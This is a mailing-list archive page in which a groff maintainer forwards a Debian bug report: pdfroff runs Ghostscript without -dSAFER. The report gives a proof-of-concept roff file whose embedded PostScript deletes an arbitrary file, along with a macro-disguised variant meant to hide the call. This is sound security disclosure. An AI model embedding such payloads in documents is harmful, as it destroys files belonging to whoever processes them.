bug-groff
[Top][All Lists]
Advanced
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

address@hidden: Bug#538338: groff: pdfroff invokes gs insecurely (withou

From: Colin Watson
Subject: address@hidden: Bug#538338: groff: pdfroff invokes gs insecurely (without -dSAFER)]
Date: Tue, 11 Aug 2009 09:51:21 -0000
User-agent: Mutt/1.5.18 (2008-05-17) 
groff uses -dSAFER elsewhere (pre-html.cpp); is there any reason not to
do so here?

Thanks,

-- 
Colin Watson                                       address@hidden
--- Begin Message --- Subject: Bug#538338: groff: pdfroff invokes gs insecurely (without -dSAFER) Date: Fri, 24 Jul 2009 22:17:15 +0000 User-agent: Mutt/1.5.20 (2009-06-14) 
Package: groff
Version: 1.20.1-4
Severity: grave
File: /usr/bin/pdfroff
Tags: security

pdfroff invokes gs without -dSAFER, leading to the ability to write,
rename, and delete arbitrary files:

  lakeview ok % cat attack.roff
  I am an evil attacking document.  Boo!
  \X'ps: exec (/tmp/remove-me) deletefile'
  lakeview ok % touch /tmp/remove-me && pdfroff attack.roff >/dev/null && [ ! 
-f "/tmp/remove-me" ] && echo removed
  GPL Ghostscript SVN PRE-RELEASE 8.64: Unrecoverable error, exit code 1
  removed

Using ps2pdf may be a better solution, since it uses -dSAFER
automatically.

Obviously, this is a fairly straightforward example, but in a document
the size of groff's -me manual, this could easily be hidden.  Disguising
it is easy, such as in:

  lakeview ok % cat attack.roff
  I am an evil attacking document.  Boo!
  .ds df deletefile
  .ds fn /tmp/remove-me
  \X'ps: exec (\*(fn) \*(df'

Processing or viewing a document from an unknown source shouldn't by
default cause code from that document to be executed, in general.

-- System Information:
Debian Release: squeeze/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.30-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/zsh4

Versions of packages groff depends on:
ii  groff-base                    1.20.1-4   GNU troff text-formatting system (
ii  libc6                         2.9-21     GNU C Library: Shared libraries
ii  libgcc1                       1:4.4.1-1  GCC support library
ii  libice6                       2:1.0.5-1  X11 Inter-Client Exchange library
ii  libsm6                        2:1.1.0-2  X11 Session Management library
ii  libstdc++6                    4.4.1-1    The GNU Standard C++ Library v3
ii  libx11-6                      2:1.2.2-1  X11 client-side library
ii  libxaw7                       2:1.0.5-2  X11 Athena Widget library
ii  libxmu6                       2:1.0.4-1  X11 miscellaneous utility library
ii  libxt6                        1:1.0.5-3  X11 toolkit intrinsics library

Versions of packages groff recommends:
ii  ghostscript                8.64~dfsg-13  The GPL Ghostscript PostScript/PDF
ii  imagemagick                7:6.5.1.0-1.1 image manipulation programs
ii  libpaper1                  1.1.23+nmu1   library for handling paper charact
ii  netpbm                     2:10.0-12     Graphics conversion tools
ii  psutils                    1.17-26       A collection of PostScript documen

groff suggests no packages.

-- no debconf information

-- 
brian m. carlson / brian with sandals: Houston, Texas, US
+1 713 440 7475 | http://crustytoothpaste.ath.cx/~bmc | My opinion only
OpenPGP: RSA v4 4096b 88AC E9B2 9196 305B A994 7552 F1BA 225C 0223 B187

Attachment: signature.asc
Description: Digital signature


--- End Message ---
reply via email to
[Prev in Thread] Current Thread [Next in Thread]